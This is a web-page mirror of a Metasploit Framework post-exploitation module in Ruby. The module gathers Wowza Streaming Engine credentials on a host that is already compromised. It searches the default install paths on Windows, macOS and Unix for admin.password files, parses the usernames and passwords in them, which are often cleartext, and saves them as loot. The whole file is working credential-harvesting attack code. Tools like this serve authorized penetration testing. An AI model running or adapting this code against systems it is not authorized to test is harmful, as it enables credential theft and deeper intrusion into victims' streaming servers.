CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/wowza_streaming_engine_creds.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Gather Wowza Streaming Engine Credentials',

14
        'Description' => %q{

15
          This module collects Wowza Streaming Engine user credentials.

16
        },

17
        'License' => MSF_LICENSE,

18
        'References' => [

19
          [ 'URL', 'https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api' ],

20
          [ 'URL', 'https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf' ],

21
        ],

22
        'Author' => ['bcoles'],

23
        'Platform' => %w[win linux osx unix],

24
        'SessionTypes' => %w[meterpreter powershell shell],

25
        'Notes' => {

26
          'Stability' => [],

27
          'Reliability' => [],

28
          'SideEffects' => []

29
        }

30
      )

31
    )

32
  end

33


34
  def parse_admin_config(config_path)

35
    return [] if config_path.blank?

36


37
    print_status("Parsing file #{config_path}")

38


39
    begin

40
      config_data = read_file(config_path)

41
    rescue StandardError => e

42
      print_error("Could not read #{config_path} : #{e.message}")

43
      return []

44
    end

45


46
    if config_data.blank?

47
      print_warning('Configuration file is empty')

48
      return []

49
    end

50


51
    # Admin password file (format: [username][space][password][space][groups][space][passwordEncoding])

52
    # [groups]= "admin" | "admin|advUser" | "basic".

53
    # [passwordEncoding]= "cleartext" | "bcrypt" | "digest". If no value is specified, defaults to "cleartext".

54


55
    creds = []

56
    config_data.each_line do |line|

57
      line.strip!

58


59
      next if line.blank?

60
      next if line.starts_with?('#')

61


62
      username, password, groups, encoding = line.split(' ')

63
      creds << [username, password, groups, encoding]

64
    end

65


66
    creds

67
  end

68


69
  # Application is installed to Program Files\\Wowza Media Systems\\Wowza Streaming Engine <version>

70
  def config_files_win

71
    configs = []

72


73
    [

74
      (get_env('ProgramFiles') || 'C:\\Program Files') + '\\Wowza Media Systems',

75
      (get_env('ProgramW6432') || 'C:\\Program Files') + '\\Wowza Media Systems',

76
      (get_env('ProgramFiles(x86)') || 'C:\\Program Files (x86)') + '\\Wowza Media Systems',

77
      'C:\\Program Files\\Wowza Media Systems',

78
      'C:\\Program Files (x86)\\Wowza Media Systems',

79
    ].uniq.each do |wowza_dir|

80
      next unless directory?(wowza_dir)

81


82
      dirs = dir(wowza_dir) || []

83


84
      dirs.each do |dir|

85
        next unless dir.starts_with?('Wowza Streaming Engine')

86


87
        config_path = "#{wowza_dir}\\#{dir}\\conf\\admin.password"

88
        configs << config_path if exists?(config_path)

89
      end

90
    end

91


92
    configs

93
  end

94


95
  # Application is installed to /Library/WowzaStreamingEngine-<version>

96
  # Symlink /Library/WowzaStreamingEngine points to the application directory

97
  # and cannot be changed.

98
  # https://www.wowza.com/community/t/default-installation-directory/635/2

99
  def config_files_osx

100
    config_path = '/Library/WowzaStreamingEngine/conf/admin.password'

101
    exists?(config_path) ? [config_path] : []

102
  end

103


104
  # Application is installed to /usr/local/WowzaStreamingEngine-<version>

105
  # Symlink /usr/local/WowzaStreamingEngine points to the application directory

106
  # and cannot be changed.

107
  # https://www.wowza.com/community/t/default-installation-directory/635/2

108
  def config_files_unix

109
    config_path = '/usr/local/WowzaStreamingEngine/conf/admin.password'

110
    exists?(config_path) ? [config_path] : []

111
  end

112


113
  def run

114
    case session.platform

115
    when 'windows'

116
      configs = config_files_win

117
    when 'osx'

118
      configs = config_files_osx

119
    else

120
      configs = config_files_unix

121
    end

122


123
    fail_with(Failure::NotFound, 'Found no Wowza Streaming Engine admin.password config files') if configs.empty?

124


125
    creds = []

126
    configs.each do |config|

127
      parse_admin_config(config).each { |c| creds << c }

128
    end

129


130
    fail_with(Failure::NotFound, 'Found no credentials') if creds.empty?

131


132
    columns = %w[Username Password Groups Encoding]

133


134
    tbl = Rex::Text::Table.new(

135
      'Header' => 'Wowza Streaming Engine Credentials',

136
      'Columns' => columns

137
    )

138


139
    creds.uniq.each do |c|

140
      tbl << c

141
    end

142


143
    print_line(tbl.to_s)

144
    path = store_loot('host.wowzastreamingengine', 'text/csv', session, tbl.to_csv, 'wowza_creds.csv', 'Wowza Streaming Engine credentials')

145
    print_good("Credentials stored in: #{path}")

146
  end

147
end

148


149